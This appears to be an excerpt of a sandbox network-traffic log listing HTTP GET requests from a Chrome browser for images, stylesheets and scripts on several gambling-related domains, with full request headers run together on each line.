Source: global trafficHTTP traffic detected: GET /imgs/kaiyun.png HTTP/1.1Host: 1k4ej4j1lxvjwz.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /imgs/betway.png HTTP/1.1Host: 1k4ej4j1lxvjwz.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://1k4ej4j1lxvjwz.com/css/style.cssAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /imgs/sansanqiqi.png HTTP/1.1Host: 1k4ej4j1lxvjwz.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /imgs/tychongse.png HTTP/1.1Host: 1k4ej4j1lxvjwz.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://1k4ej4j1lxvjwz.com/css/style.cssAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /imgs/188jinbaobo.png HTTP/1.1Host: 1k4ej4j1lxvjwz.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://1k4ej4j1lxvjwz.com/css/style.cssAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /imgs/weide.png HTTP/1.1Host: 1k4ej4j1lxvjwz.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://1k4ej4j1lxvjwz.com/css/style.cssAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /imgs/bet365.png HTTP/1.1Host: 1k4ej4j1lxvjwz.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /imgs/wlxe.png HTTP/1.1Host: 1k4ej4j1lxvjwz.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /imgs/2025fajia.png HTTP/1.1Host: 1k4ej4j1lxvjwz.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://1k4ej4j1lxvjwz.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /imgs/bg.lanse.jpg HTTP/1.1Host: 1k4ej4j1lxvjwz.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /imgs/2025shiyunhui.png HTTP/1.1Host: 1k4ej4j1lxvjwz.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://1k4ej4j1lxvjwz.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /imgs/leijingji.png HTTP/1.1Host: 1k4ej4j1lxvjwz.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /imgs/betway.png HTTP/1.1Host: 1k4ej4j1lxvjwz.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /imgs/2026shijiebei.png HTTP/1.1Host: 1k4ej4j1lxvjwz.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://1k4ej4j1lxvjwz.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /quicklink.umd.js HTTP/1.1Host: 1k4ej4j1lxvjwz.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://1k4ej4j1lxvjwz.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /imgs/tychongse.png HTTP/1.1Host: 1k4ej4j1lxvjwz.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /__local/0/D8/B4/2A6083AF30532CABE26DE75AE3C_48A88581_1249E8.png HTTP/1.1Host: www.ccsurj.orgConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /imgs/188jinbaobo.png HTTP/1.1Host: 1k4ej4j1lxvjwz.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /imgs/bwin.png HTTP/1.1Host: 1k4ej4j1lxvjwz.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://1k4ej4j1lxvjwz.com/css/style.cssAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /imgs/yongli.png HTTP/1.1Host: 1k4ej4j1lxvjwz.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://1k4ej4j1lxvjwz.com/css/style.cssAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /imgs/weide.png HTTP/1.1Host: 1k4ej4j1lxvjwz.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /imgs/2025fajia.png HTTP/1.1Host: 1k4ej4j1lxvjwz.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /imgs/2026shijiebei.png HTTP/1.1Host: 1k4ej4j1lxvjwz.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /imgs/2025shiyunhui.png HTTP/1.1Host: 1k4ej4j1lxvjwz.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /quicklink.umd.js HTTP/1.1Host: 1k4ej4j1lxvjwz.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /imgs/yongli.png HTTP/1.1Host: 1k4ej4j1lxvjwz.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /imgs/bwin.png HTTP/1.1Host: 1k4ej4j1lxvjwz.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /__local/2/47/D4/4F14A7A9A01E0D52B998F0FADA0_DD410FA8_1601EC.png?e=.png HTTP/1.1Host: www.ccsurj.orgConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: 551000l.ccConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentReferer: https://1k4ej4j1lxvjwz.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /message_zh_CN.js?v=1736150851437 HTTP/1.1Host: 551000l.ccConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://551000l.cc/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /ftl/commonPage/themes/gui-base.css HTTP/1.1Host: p3yw7u.innittapp.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://551000l.cc/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /ftl/commonPage/themes/gui-skin-default.css HTTP/1.1Host: p3yw7u.innittapp.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://551000l.cc/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /ftl/bet365-1761/themes/style/common.css HTTP/1.1Host: p3yw7u.innittapp.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://551000l.cc/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /ftl/bet365-1761/themes/style/bootstrap-dialog.min.css HTTP/1.1Host: p3yw7u.innittapp.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://551000l.cc/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /ftl/commonPage/themes/hb/css/pc.css HTTP/1.1Host: p3yw7u.innittapp.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://551000l.cc/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /061410/rcenter/common/static/css/gb.validation.min.css HTTP/1.1Host: p3yw7u.innittapp.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://551000l.cc/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /message_zh_CN.js?v=1736150851437 HTTP/1.1Host: 551000l.ccConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /ftl/commonPage/themes/hongbao.css HTTP/1.1Host: p3yw7u.innittapp.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://p3yw7u.innittapp.com/ftl/commonPage/themes/gui-base.cssAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /ftl/commonPage/themes/gui-layer.css HTTP/1.1Host: p3yw7u.innittapp.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://p3yw7u.innittapp.com/ftl/commonPage/themes/gui-base.cssAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /ftl/commonPage/js/jquery/jquery-1.11.3.min.js HTTP/1.1Host: p3yw7u.innittapp.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://551000l.cc/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /ftl/commonPage/js/float.js HTTP/1.1Host: p3yw7u.innittapp.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://551000l.cc/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /ftl/commonPage/js/idangerous.swiper.min.js HTTP/1.1Host: p3yw7u.innittapp.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://551000l.cc/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /ftl/commonPage/js/websocket/Comet.js HTTP/1.1Host: p3yw7u.innittapp.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://551000l.cc/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /ftl/commonPage/js/websocket/CometMarathon.js HTTP/1.1Host: p3yw7u.innittapp.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://551000l.cc/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /ftl/commonPage/js/websocket/PopUp.js HTTP/1.1Host: p3yw7u.innittapp.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://551000l.cc/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /ftl/commonPage/js/lazyload.js HTTP/1.1Host: p3yw7u.innittapp.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://551000l.cc/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /ftl/commonPage/js/gui-base.js HTTP/1.1Host: p3yw7u.innittapp.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://551000l.cc/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /ftl/commonPage/js/bootstrap-dialog.min.js HTTP/1.1Host: p3yw7u.innittapp.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://551000l.cc/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
